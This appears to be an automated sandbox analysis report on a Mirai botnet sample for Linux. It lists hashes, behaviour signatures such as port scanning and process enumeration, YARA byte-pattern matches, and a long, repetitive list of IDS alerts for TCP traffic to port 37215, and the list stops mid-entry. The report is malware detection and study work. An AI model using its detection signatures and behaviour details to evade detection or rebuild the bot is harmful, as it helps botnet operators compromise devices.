Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
x86.nn.elf

Overview

General Information

Sample name:x86.nn.elf
Analysis ID:1448550
MD5:df009b3d666e3ae272b1ae1a5f0df341
SHA1:02cdbe0036ebfae8dae8e2fbf17f1ac51ca364a4
SHA256:c7dbab1e4dcfb49f3cf5d0bb0a743a400ec3719a0c40494c74078e27eda1e065
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1448550
Start date and time:2024-05-28 14:46:12 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86.nn.elf
Detection:MAL
Classification:mal92.troj.linELF@0/0@2/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: x86.nn.elf
Command:/tmp/x86.nn.elf
PID:6220
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
success
Standard Error:
  • system is lnxubuntu20
  • x86.nn.elf (PID: 6220, Parent: 6135, MD5: df009b3d666e3ae272b1ae1a5f0df341) Arguments: /tmp/x86.nn.elf
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
x86.nn.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    x86.nn.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      x86.nn.elfLinux_Trojan_Mirai_b14f4c5dunknownunknown
      • 0x37f0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
      x86.nn.elfLinux_Trojan_Mirai_0bce98a2unknownunknown
      • 0xab5d:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
      x86.nn.elfLinux_Trojan_Mirai_88de437funknownunknown
      • 0x7a32:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
      Click to see the 5 entries
      SourceRuleDescriptionAuthorStrings
      6220.1.0000000008048000.0000000008054000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        6220.1.0000000008048000.0000000008054000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
          6220.1.0000000008048000.0000000008054000.r-x.sdmpLinux_Trojan_Mirai_b14f4c5dunknownunknown
          • 0x37f0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
          6220.1.0000000008048000.0000000008054000.r-x.sdmpLinux_Trojan_Mirai_0bce98a2unknownunknown
          • 0xab5d:$a: 4B 52 41 00 46 47 44 43 57 4E 56 00 48 57 43 4C 56 47 41 4A
          6220.1.0000000008048000.0000000008054000.r-x.sdmpLinux_Trojan_Mirai_88de437funknownunknown
          • 0x7a32:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
          Click to see the 5 entries
          Timestamp:05/28/24-14:47:12.877881
          SID:2829579
          Source Port:41698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325738
          SID:2829579
          Source Port:55068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595038
          SID:2835222
          Source Port:58408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299691
          SID:2835222
          Source Port:39520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664476
          SID:2835222
          Source Port:58458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401046
          SID:2829579
          Source Port:48330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231714
          SID:2829579
          Source Port:51170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664641
          SID:2835222
          Source Port:45652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922203
          SID:2829579
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142798
          SID:2829579
          Source Port:40674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372164
          SID:2829579
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536663
          SID:2829579
          Source Port:43556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707586
          SID:2835222
          Source Port:36718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201513
          SID:2829579
          Source Port:50346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.617003
          SID:2835222
          Source Port:46720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764453
          SID:2829579
          Source Port:33490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.151328
          SID:2829579
          Source Port:43454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989116
          SID:2829579
          Source Port:54178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204524
          SID:2835222
          Source Port:39324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214823
          SID:2835222
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242025
          SID:2835222
          Source Port:53886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852655
          SID:2829579
          Source Port:60208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890720
          SID:2829579
          Source Port:55458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561002
          SID:2829579
          Source Port:46224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.603046
          SID:2835222
          Source Port:45662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216724
          SID:2829579
          Source Port:50320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161783
          SID:2829579
          Source Port:50892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.290315
          SID:2835222
          Source Port:41188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465271
          SID:2835222
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269283
          SID:2835222
          Source Port:35404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066088
          SID:2835222
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919046
          SID:2829579
          Source Port:51228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979052
          SID:2835222
          Source Port:50166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550752
          SID:2835222
          Source Port:46984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652521
          SID:2835222
          Source Port:32844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530059
          SID:2835222
          Source Port:55560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102234
          SID:2835222
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.929150
          SID:2829579
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266185
          SID:2835222
          Source Port:47030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046664
          SID:2835222
          Source Port:53316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156322
          SID:2835222
          Source Port:46006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065049
          SID:2835222
          Source Port:33766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115644
          SID:2829579
          Source Port:55370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.405332
          SID:2829579
          Source Port:40378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623566
          SID:2829579
          Source Port:40406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976536
          SID:2829579
          Source Port:52032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463998
          SID:2829579
          Source Port:58306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271154
          SID:2829579
          Source Port:48246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744802
          SID:2829579
          Source Port:32958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.797047
          SID:2835222
          Source Port:40748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739583
          SID:2835222
          Source Port:58120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710753
          SID:2829579
          Source Port:59282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594980
          SID:2829579
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865941
          SID:2829579
          Source Port:40660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592484
          SID:2835222
          Source Port:56394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876557
          SID:2835222
          Source Port:55352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778784
          SID:2835222
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213516
          SID:2835222
          Source Port:43378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269835
          SID:2835222
          Source Port:49784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115355
          SID:2835222
          Source Port:34392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652838
          SID:2835222
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493090
          SID:2829579
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635198
          SID:2829579
          Source Port:38986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.566513
          SID:2835222
          Source Port:41818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.150764
          SID:2835222
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472460
          SID:2835222
          Source Port:40682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962833
          SID:2835222
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.157099
          SID:2829579
          Source Port:51438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175952
          SID:2835222
          Source Port:41750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809369
          SID:2829579
          Source Port:41390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780763
          SID:2829579
          Source Port:58760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892545
          SID:2829579
          Source Port:47764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878341
          SID:2835222
          Source Port:41366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196158
          SID:2835222
          Source Port:60578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465301
          SID:2829579
          Source Port:51954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465321
          SID:2835222
          Source Port:57864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399636
          SID:2829579
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075136
          SID:2835222
          Source Port:53216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067258
          SID:2829579
          Source Port:43130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847628
          SID:2835222
          Source Port:52694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.308082
          SID:2829579
          Source Port:48026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201375
          SID:2829579
          Source Port:50270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.919072
          SID:2835222
          Source Port:55552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271659
          SID:2829579
          Source Port:36808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763646
          SID:2835222
          Source Port:58128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.961768
          SID:2835222
          Source Port:41482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728048
          SID:2835222
          Source Port:48164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167697
          SID:2835222
          Source Port:37116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590449
          SID:2829579
          Source Port:45790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990574
          SID:2835222
          Source Port:51764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197995
          SID:2829579
          Source Port:51228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977539
          SID:2829579
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547337
          SID:2835222
          Source Port:56000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.159155
          SID:2829579
          Source Port:40150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241144
          SID:2835222
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651397
          SID:2829579
          Source Port:35590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.357147
          SID:2835222
          Source Port:38268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964192
          SID:2835222
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328082
          SID:2829579
          Source Port:51550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.811678
          SID:2835222
          Source Port:55870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.237196
          SID:2829579
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266875
          SID:2835222
          Source Port:53724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602449
          SID:2829579
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293910
          SID:2829579
          Source Port:45392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.935170
          SID:2835222
          Source Port:56596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989040
          SID:2835222
          Source Port:59462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.591343
          SID:2835222
          Source Port:41666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536978
          SID:2829579
          Source Port:34906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684974
          SID:2835222
          Source Port:32946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332719
          SID:2829579
          Source Port:57308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299255
          SID:2835222
          Source Port:41334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.341839
          SID:2829579
          Source Port:48476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598482
          SID:2829579
          Source Port:56508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472596
          SID:2835222
          Source Port:41420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877069
          SID:2829579
          Source Port:52612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978383
          SID:2829579
          Source Port:53398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666244
          SID:2835222
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301257
          SID:2835222
          Source Port:48712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724359
          SID:2835222
          Source Port:41728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815729
          SID:2835222
          Source Port:38188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291740
          SID:2829579
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247106
          SID:2835222
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666948
          SID:2829579
          Source Port:53298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272375
          SID:2829579
          Source Port:34474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271213
          SID:2835222
          Source Port:59854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803165
          SID:2835222
          Source Port:60376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126479
          SID:2829579
          Source Port:59160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756521
          SID:2829579
          Source Port:55794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543098
          SID:2835222
          Source Port:56800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048534
          SID:2829579
          Source Port:41904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530240
          SID:2829579
          Source Port:35262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271882
          SID:2835222
          Source Port:51390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123713
          SID:2829579
          Source Port:48848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.809912
          SID:2829579
          Source Port:33366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066062
          SID:2829579
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.156300
          SID:2835222
          Source Port:46302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186034
          SID:2829579
          Source Port:47974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.913629
          SID:2829579
          Source Port:47436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164474
          SID:2829579
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594677
          SID:2835222
          Source Port:57640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.481755
          SID:2835222
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817675
          SID:2835222
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868119
          SID:2835222
          Source Port:34426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325684
          SID:2829579
          Source Port:38858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266627
          SID:2835222
          Source Port:52150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188084
          SID:2829579
          Source Port:40100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022355
          SID:2835222
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.080624
          SID:2829579
          Source Port:41848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401371
          SID:2835222
          Source Port:47790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724027
          SID:2835222
          Source Port:33270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176267
          SID:2829579
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659029
          SID:2829579
          Source Port:52916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204628
          SID:2835222
          Source Port:47128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711081
          SID:2835222
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185590
          SID:2835222
          Source Port:40518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301112
          SID:2829579
          Source Port:43164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.175782
          SID:2835222
          Source Port:44064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843136
          SID:2835222
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325384
          SID:2835222
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305674
          SID:2829579
          Source Port:47580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481331
          SID:2835222
          Source Port:39078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842393
          SID:2835222
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403351
          SID:2835222
          Source Port:43048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.488778
          SID:2835222
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845067
          SID:2829579
          Source Port:53324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.565833
          SID:2829579
          Source Port:45722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711014
          SID:2829579
          Source Port:47086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550618
          SID:2835222
          Source Port:35360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123617
